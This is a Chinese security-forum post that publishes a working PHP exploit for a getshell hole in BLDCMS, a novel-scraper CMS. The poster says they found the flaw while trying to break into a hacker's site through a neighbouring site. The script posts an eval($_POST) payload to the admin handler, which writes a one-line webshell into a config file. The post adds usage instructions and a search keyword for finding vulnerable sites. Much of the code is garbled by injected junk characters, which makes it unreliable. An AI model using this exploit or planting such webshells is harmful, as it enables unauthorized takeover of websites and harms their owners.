找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 BLDCMS(白老大小说) Getshell 0day EXP
返回列表 发新帖
查看: 3179|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞! ~: ?/ ^- b( ^5 K! C' g7 s4 n2 p

( c) _0 G( f- g) g4 N7 t. R0 Y
4 r& T, T) F$ \! a8 ^/ F' |3 s话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ' l- z: G- m# `9 o

, b, y+ k$ S6 r) ]+ ]4 w既然都有人发了 我就把我之前写好的EXP放出来吧
# H9 \9 k/ d! D4 I* i % S* y1 ]6 C% R
view source print?01.php;">
% G- Q; }+ M( s, ?0 u02.<!--?php) Q" b; ~. p! S. o4 Z! n
03.echo "-------------------------------------------------------------------5 y$ V# ^3 @6 f+ }
04. ; ^9 y5 l2 ]4 |5 Q# O+ F
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
' _2 E; U  m& h: \4 O" c! e8 H1 b06.
$ a5 G! S, k7 r07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
: c5 R0 n9 U/ {8 t08. 1 Z( C. l( f  V& ~) u
09.QQ:981009941\r\n                                2013.3.21\r\n             % z( D7 [: P9 p' ?) n+ e
10. ) E; D$ `% f* R& C
11. ( J; v! K3 _. s
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
: S' ~7 R9 `. Z6 b* C( x13.
  `% ^( p2 o5 `7 r: X14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
' U& s/ y4 N) n" `# }* K15.
) x  c4 Z/ K1 q  p16.--------------------------------------------------------------------\r\n";6 z& q( L$ C, Z
17.$url=$argv[1];3 J. m6 r+ f/ I3 Z4 B# |
18.$dir=$argv[2];% C( J: _( b- }( m
19.$pass=$argv[3];; c, j2 Y) B  m+ \
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
" i8 M6 \9 A# J! d/ J8 o+ Q21.if (emptyempty($pass)||emptyempty($url))
5 h. H" f; h" a) S$ n) J22.{exit("请输入参数");}  J% X+ P9 i7 b! U
23.else
. F( w# o" A& |# Z3 @24.{, L3 b% l5 H$ D( J* D- m+ _
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev) y. O& q$ h% Q8 _2 B; A' [
26.
& E8 E! K6 B2 O5 y% K27.al;
% u, J0 B4 h* g) f28.$length = strlen($fuckdata);
- ]+ p7 `- V- M/ Z9 _' n; {29.function getshell($url,$pass)5 t: `( ?" l; M
30.{
* |4 N& t# z; D" _8 f1 s" [$ H31.global $url,$dir,$pass,$eval,$length,$fuckdata;
! C, @/ G5 T/ ^; [32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ [6 K3 l# u1 o: {( X5 G2 D) y# b33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";0 e: v  Y( m( Q) M
34.$header .= "User-Agent: MSIE\r\n";
1 i; r2 D( P  C# ?$ j  S7 s' U35.$header .= "Host:".$url."\r\n";
! _! g( q) s7 z2 ~! _( {  j36.$header .= "Content-Length: ".$length."\r\n";
; q) }# ~6 m; Y37.$header .= "Connection: Close\r\n";, O9 f+ L% K& ?4 C
38.$header .="\r\n";
1 s* C7 ?! I0 e8 t% c" s/ E, O39.$header .= $fuckdata."\r\n\r\n";# w" A" @* Q9 S9 h4 F
40.$fp = fsockopen($url, 80,$errno,$errstr,15);- V( [4 Y, a- J0 d
41.if (!$fp)9 n9 j, e$ Z* _) [" Z0 d) Q
42.{3 S% O6 s' M8 a( C
43.exit ("利用失败:请检查指定目标是否能正常打开");
2 e. @, t( M" x0 ?44.}+ N( i3 X; M% o! S$ q5 ?
45.else{ if (!fputs($fp,$header)), c  A1 k6 J. K3 v! p5 d
46.{exit ("利用失败");}
* w# @0 u) Q7 c0 t" p( w3 n- r47.else$ O2 i4 X  z" |( A) r+ s7 g( I& P
48.{
- v) h* ~/ k1 u# _  p3 k% T2 ]49.$receive = '';3 }' K. P2 C+ K# p" @% w0 a* b) {* Z
50.while (!feof($fp)) {
* _) z8 S( F2 I/ L5 J6 j51.$receive .= @fgets($fp, 1000);/ G) p+ Z) J4 S7 T
52.}
( X9 e; c. \, F) ?  A' |53.@fclose($fp);$ K* q, ?; X9 s+ q6 Y3 j& p& U
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标1 c4 Y/ J. u- o( P
55.
3 k$ a, W* J; U/ L2 t' n56.GPC是否=off)";) `9 s, J* N! l& c/ Z
57.}}
: |" C9 _( y& \58.}
+ W, @. x" U# t" q% e! ~6 |8 D- m59.}3 d5 g; \/ c- J" \  e! m' _
60.getshell($url,$pass);
0 S) k% h- k. Y& j5 D2 A& X61.?-->
" L- U. W" b7 Z2 _$ U4 e   I9 g) U$ Z) L% O6 F6 u2 K
8 m+ Z$ ?' Z" G5 O6 x2 C
# ?6 \6 B; [7 U! g* h* W0 x
by 数据流% B* R6 a* R% j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表